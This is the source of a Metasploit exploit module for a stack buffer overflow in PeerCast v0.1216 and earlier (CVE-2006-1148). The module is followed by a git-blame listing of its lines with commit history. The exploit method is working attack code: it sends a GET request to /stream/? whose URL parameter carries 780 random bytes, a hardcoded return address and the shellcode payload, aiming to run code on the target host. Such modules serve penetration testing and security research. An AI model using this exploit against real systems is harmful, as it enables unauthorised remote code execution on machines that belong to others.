modules/exploits/linux/http/peercast_url.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PeerCast URL Handling Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in PeerCast <= v0.1216.
          The vulnerability is caused due to a boundary error within the
          handling of URL parameters.
        },
        'Author' => [ 'MC' ],
        'License' => BSD_LICENSE,
        'References' => [
          ['CVE', '2006-1148'],
          ['OSVDB', '23777'],
          ['BID', '17040']
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 200,
          'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
          'MinNops' => 64,
        },
        'Platform' => 'linux',
        'Arch' => ARCH_X86,
        'Targets' => [
          ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
        ],
        'DisclosureDate' => '2006-03-08',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      Opt::RPORT(7144)
    ])
  end

  def exploit
    connect

    pat = rand_text_alphanumeric(780)
    pat << [target.ret].pack('V')
    pat << payload.encoded

    uri = '/stream/?' + pat

    res = "GET #{uri} HTTP/1.0\r\n\r\n"

    print_status("Trying target address 0x%.8x..." % target.ret)
    sock.put(res)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
PeerCast exploits 2006-03-30 21:05:42 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
PeerCast exploits 2006-03-30 21:05:42 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'PeerCast URL Handling Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in PeerCast <= v0.1216.`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`The vulnerability is caused due to a boundary error within the`
			`handling of URL parameters.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => BSD_LICENSE,`
			`'References' => [`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`['CVE', '2006-1148'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '23777'],`
Remove bad references (dead links) 2015-10-27 12:41:32 -05:00			`['BID', '17040']`
PeerCast exploits 2006-03-30 21:05:42 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => false,`
			`'Payload' => {`
			`'Space' => 200,`
PeerCast exploits 2006-03-30 21:05:42 +00:00			`'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'MinNops' => 64,`
PeerCast exploits 2006-03-30 21:05:42 +00:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'linux',`
			`'Arch' => ARCH_X86,`
			`'Targets' => [`
PeerCast exploits 2006-03-30 21:05:42 +00:00			`['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],`
			`],`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2006-03-08',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
			`register_options([`
			`Opt::RPORT(7144)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
PeerCast exploits 2006-03-30 21:05:42 +00:00			`end`

			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`pat = rand_text_alphanumeric(780)`
PeerCast exploits 2006-03-30 21:05:42 +00:00			`pat << [target.ret].pack('V')`
			`pat << payload.encoded`

			`uri = '/stream/?' + pat`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
PeerCast exploits 2006-03-30 21:05:42 +00:00			`res = "GET #{uri} HTTP/1.0\r\n\r\n"`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
PeerCast exploits 2006-03-30 21:05:42 +00:00			`print_status("Trying target address 0x%.8x..." % target.ret)`
			`sock.put(res)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
PeerCast exploits 2006-03-30 21:05:42 +00:00			`handler`
			`disconnect`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`